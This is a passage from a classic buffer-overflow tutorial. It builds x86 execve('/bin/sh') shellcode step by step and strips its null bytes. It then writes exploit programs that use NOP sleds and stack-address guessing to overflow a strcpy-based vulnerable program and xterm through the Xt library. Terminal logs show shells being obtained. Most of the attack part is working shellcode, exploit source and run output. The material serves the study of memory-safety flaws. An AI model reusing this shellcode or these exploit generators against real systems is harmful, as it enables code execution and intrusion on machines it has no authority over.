c) Copy 0xb into the EAX register.
d) Copy the address of the address of the string "/bin/sh" into the
EBX register.
e) Copy the address of the string "/bin/sh" into the ECX register.
f) Copy the address of the null long word into the EDX register.
g) Execute the int $0x80 instruction.
But what if the execve() call fails for some reason? The program will
continue fetching instructions from the stack, which may contain random data!
The program will most likely core dump. We want the program to exit cleanly
if the execve syscall fails. To accomplish this we must then add a exit
syscall after the execve syscall. What does the exit syscall looks like?
exit.c
------------------------------------------------------------------------------
#include
void main() {
exit(0);
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1,%eax
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx
0x8000358 <_exit+12>: int $0x80
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.
------------------------------------------------------------------------------
The exit syscall will place 0x1 in EAX, place the exit code in EBX,
and execute "int 0x80". That's it. Most applications return 0 on exit to
indicate no errors. We will place 0 in EBX. Our list of steps is now:
a) Have the null terminated string "/bin/sh" somewhere in memory.
b) Have the address of the string "/bin/sh" somewhere in memory
followed by a null long word.
c) Copy 0xb into the EAX register.
d) Copy the address of the address of the string "/bin/sh" into the
EBX register.
e) Copy the address of the string "/bin/sh" into the ECX register.
f) Copy the address of the null long word into the EDX register.
g) Execute the int $0x80 instruction.
h) Copy 0x1 into the EAX register.
i) Copy 0x0 into the EBX register.
j) Execute the int $0x80 instruction.
Trying to put this together in assembly language, placing the string
after the code, and remembering we will place the address of the string,
and null word after the array, we have:
------------------------------------------------------------------------------
movl string_addr,string_addr_addr
movb $0x0,null_byte_addr
movl $0x0,null_addr
movl $0xb,%eax
movl string_addr,%ebx
leal string_addr,%ecx
leal null_string,%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
/bin/sh string goes here.
------------------------------------------------------------------------------
The problem is that we don't know where in the memory space of the
program we are trying to exploit the code (and the string that follows
it) will be placed. One way around it is to use a JMP, and a CALL
instruction. The JMP and CALL instructions can use IP relative addressing,
which means we can jump to an offset from the current IP without needing
to know the exact address of where in memory we want to jump to. If we
place a CALL instruction right before the "/bin/sh" string, and a JMP
instruction to it, the strings address will be pushed onto the stack as
the return address when CALL is executed. All we need then is to copy the
return address into a register. The CALL instruction can simply call the
start of our code above. Assuming now that J stands for the JMP instruction,
C for the CALL instruction, and s for the string, the execution flow would
now be:
bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of
memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory
buffer sfp ret a b c
<------ [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
^|^ ^| |
|||_____________||____________| (1)
(2) ||_____________||
|______________| (3)
top of bottom of
stack stack
With this modifications, using indexed addressing, and writing down how
many bytes each instruction takes our code looks like:
------------------------------------------------------------------------------
jmp offset-to-call # 2 bytes
popl %esi # 1 byte
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi)# 4 bytes
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset,(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call offset-to-popl # 5 bytes
/bin/sh string goes here.
------------------------------------------------------------------------------
Calculating the offsets from jmp to call, from call to popl, from
the string address to the array, and from the string address to the null
long word, we now have:
------------------------------------------------------------------------------
jmp 0x26 # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string \"/bin/sh\" # 8 bytes
------------------------------------------------------------------------------
Looks good. To make sure it works correctly we must compile it and run it.
But there is a problem. Our code modifies itself, but most operating system
mark code pages read-only. To get around this restriction we must place the
code we wish to execute in the stack or data segment, and transfer control
to it. To do so we will place our code in a global array in the data
segment. We need first a hex representation of the binary code. Lets
compile it first, and then use gdb to obtain it.
shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
jmp 0x2a # 3 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes
");
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 : pushl %ebp
0x8000131 : movl %esp,%ebp
0x8000133 : jmp 0x800015f
0x8000135 : popl %esi
0x8000136 : movl %esi,0x8(%esi)
0x8000139 : movb $0x0,0x7(%esi)
0x800013d : movl $0x0,0xc(%esi)
0x8000144 : movl $0xb,%eax
0x8000149 : movl %esi,%ebx
0x800014b : leal 0x8(%esi),%ecx
0x800014e : leal 0xc(%esi),%edx
0x8000151 : int $0x80
0x8000153 : movl $0x1,%eax
0x8000158 : movl $0x0,%ebx
0x800015d : int $0x80
0x800015f : call 0x8000135
0x8000164 : das
0x8000165 : boundl 0x6e(%ecx),%ebp
0x8000168 : das
0x8000169 : jae 0x80001d3 <__new_exitfn+55>
0x800016b : addb %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 : 0xeb
(gdb)
0x8000134 : 0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------
testsc.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------
It works! But there is an obstacle. In most cases we'll be trying to
overflow a character buffer. As such any null bytes in our shellcode will be
considered the end of the string, and the copy will be terminated. There must
be no null bytes in the shellcode for the exploit to work. Let's try to
eliminate the bytes (and at the same time make it smaller).
Problem instruction: Substitute with:
--------------------------------------------------------
movb $0x0,0x7(%esi) xorl %eax,%eax
molv $0x0,0xc(%esi) movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
--------------------------------------------------------
movl $0xb,%eax movb $0xb,%al
--------------------------------------------------------
movl $0x1, %eax xorl %ebx,%ebx
movl $0x0, %ebx movl %ebx,%eax
inc %eax
--------------------------------------------------------
Our improved code:
shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
jmp 0x1f # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
xorl %eax,%eax # 2 bytes
movb %eax,0x7(%esi) # 3 bytes
movl %eax,0xc(%esi) # 3 bytes
movb $0xb,%al # 2 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
xorl %ebx,%ebx # 2 bytes
movl %ebx,%eax # 2 bytes
inc %eax # 1 bytes
int $0x80 # 2 bytes
call -0x24 # 5 bytes
.string \"/bin/sh\" # 8 bytes
# 46 bytes total
");
}
------------------------------------------------------------------------------
And our new test program:
testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------
Writing an Exploit
~~~~~~~~~~~~~~~~~~
(or how to mung the stack)
~~~~~~~~~~~~~~~~~~~~~~~~~~
Lets try to pull all our pieces together. We have the shellcode. We know
it must be part of the string which we'll use to overflow the buffer. We
know we must point the return address back into the buffer. This example will
demonstrate these points:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o exploit1 exploit1.c
[aleph1]$ ./exploit1
$ exit
exit
[aleph1]$
------------------------------------------------------------------------------
What we have done above is filled the array large_string[] with the
address of buffer[], which is where our code will be. Then we copy our
shellcode into the beginning of the large_string string. strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located. Once we reach the end of main and it tried to return it
jumps to our code, and execs a shell.
The problem we are faced when trying to overflow the buffer of another
program is trying to figure out at what address the buffer (and thus our
code) will be. The answer is that for every program the stack will
start at the same address. Most programs do not push more than a few hundred
or a few thousand bytes into the stack at any one time. Therefore by knowing
where the stack starts we can try to guess where the buffer we are trying to
overflow will be. Here is a little program that will print its stack
pointer:
sp.c
------------------------------------------------------------------------------
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main() {
printf("0x%x\n", get_sp());
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ ./sp
0x8000470
[aleph1]$
------------------------------------------------------------------------------
Lets assume this is the program we are trying to overflow is:
vulnerable.c
------------------------------------------------------------------------------
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
------------------------------------------------------------------------------
We can create a program that takes as a parameter a buffer size, and an
offset from its own stack pointer (where we believe the buffer we want to
overflow may live). We'll put the overflow string in an environment variable
so it is easy to manipulate:
exploit2.c
------------------------------------------------------------------------------
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
Now we can try to guess what the buffer and offset should be:
------------------------------------------------------------------------------
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------
As we can see this is not an efficient process. Trying to guess the
offset even while knowing where the beginning of the stack lives is nearly
impossible. We would need at best a hundred tries, and at worst a couple of
thousand. The problem is we need to guess *exactly* where the address of our
code will start. If we are off by one byte more or less we will just get a
segmentation violation or a invalid instruction. One way to increase our
chances is to pad the front of our overflow buffer with NOP instructions.
Almost all processors have a NOP instruction that performs a null operation.
It is usually used to delay execution for purposes of timing. We will take
advantage of it and fill half of our overflow buffer with them. We will place
our shellcode at the center, and then follow it with the return addresses. If
we are lucky and the return address points anywhere in the string of NOPs,
they will just get executed until they reach our code. In the Intel
architecture the NOP instruction is one byte long and it translates to 0x90
in machine code. Assuming the stack starts at address 0xFF, that S stands for
shell code, and that N stands for a NOP instruction the new stack would look
like this:
bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of
memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory
buffer sfp ret a b c
<------ [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
^ |
|_____________________|
top of bottom of
stack stack
The new exploits is then:
exploit3.c
------------------------------------------------------------------------------
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
A good selection for our buffer size is about 100 bytes more than the size
of the buffer we are trying to overflow. This will place our code at the end
of the buffer we are trying to overflow, giving a lot of space for the NOPs,
but still overwriting the return address with the address we guessed. The
buffer we are trying to overflow is 512 bytes long, so we'll use 612. Let's
try to overflow our test program with our new exploit:
------------------------------------------------------------------------------
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------
Whoa! First try! This change has improved our chances a hundredfold.
Let's try it now on a real case of a buffer overflow. We'll use for our
demonstration the buffer overflow on the Xt library. For our example, we'll
use xterm (all programs linked with the Xt library are vulnerable). You must
be running an X server and allow connections to it from the localhost. Set
your DISPLAY variable accordingly.
------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit3 1124
Using address: 0xbffffdb4
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF
°
óV
¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤
ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤
¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤
^C
[aleph1]$ exit
[aleph1]$ ./exploit3 2148 100
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF
°
óV
¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤
ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H
¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿
H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ
¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ
Warning: some arguments in previous message were lost
Illegal instruction
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit4 2148 600
Using address: 0xbffffb54
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF
°
óV
¤1¤Ø@¤èÜÿÿÿ/bin/shûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tû
ÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿T
ûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿
Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ
